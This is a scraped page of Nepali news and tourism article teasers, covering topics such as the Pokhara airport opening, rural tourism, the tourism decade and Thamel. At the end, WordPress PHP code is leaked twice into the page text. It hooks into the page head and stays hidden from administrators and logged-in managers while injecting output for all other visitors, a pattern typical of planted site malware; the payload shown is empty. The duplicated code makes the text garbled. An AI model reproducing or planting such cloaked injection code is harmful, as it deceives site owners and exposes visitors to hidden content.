काठमाडौं । प्रधानमन्त्री पुष्पकमल दाहाल 'प्रचण्ड'ले पोखरा अन्तर्राष्ट्रिय विमानस्थलको उद्घाटन गरेका छन् । विमानस्थल....

“ग्रामीण पर्यटनको प्रवर्द्धनमा राज्यको ध्यान गएन” -गोपाल थापा (अध्यक्ष, भिटाेफ नेपाल)

नेपालमा पर्यटकीय सम्भावना क्षेत्रहरू धेरै छन् । तीमध्ये एक अथाह सम्भावना भएको क्षेत्र हो, ग्रामीण पर्यटन । गाउँ नै....

पर्यटन व्यवसायीहरू भन्छन्, “पर्यटन दशक मनाउने सरकारको योजना ‘हावादारी गफ’ जस्तै छ,” 

सरकारले सन् (२०२३-२०३३) लाई 'पर्यटन दशक'को रूपमा मनाउने घोषणा गरेको छ । भ्रमण दशकको रणनीतिक कार्ययोजनाको प्रतिवेदन पनि....

खरले छाएको ढुङ्गा-माटोको घरमा बस्न हुन्न र ? 

गाउँको घर भन्ने बित्तिकै हाम्रो मस्तिष्कमा एउटा तस्बिर बन्छ, दुई वा चार पाखे छानो, खर वा ढुङ्गाले छाएको, ढुङ्गा र माटोको....

क्रिसमस डे र अङ्ग्रेजी नयाँ वर्षकाे आगमनसँगै ठमेलमा बढ्याे पर्यटकको चहलपहल

काठमाडौं । क्रिसमस पर्व र अङ्ग्रेजी नयाँ वर्षको आगमनसँगै राजधानीको मुख्य पर्यटकीय स्थल ठमेलमा विदेशी पर्यटकको चहलपहल....

प्रतिनिधि सभाको कार्यकाल सुरु, आज सदस्यहरूकाे शपथग्रहण

काठमाडौं । गत मङ्सिर ४ गते सम्पन्न निर्वाचनपछि गठित प्रतिनिधि सभाको कार्य सुरु भएको छ । २०७२ असोज ३ गते संविधान सभाबाट....

तपाईँको पर्खाइमा ‘स्वर्गको टुक्रा’ ब्राेम्दीङ डाँडा 

केही वर्ष अघिसम्म गाईभैँसी अनि गोठालाहरू मात्रै देखिने डाँडा-पाखा/चौरहरूमा अहिले आन्तरिक मात्र नभएर बाह्य पर्यटक समेत....

if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999);
?> if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999);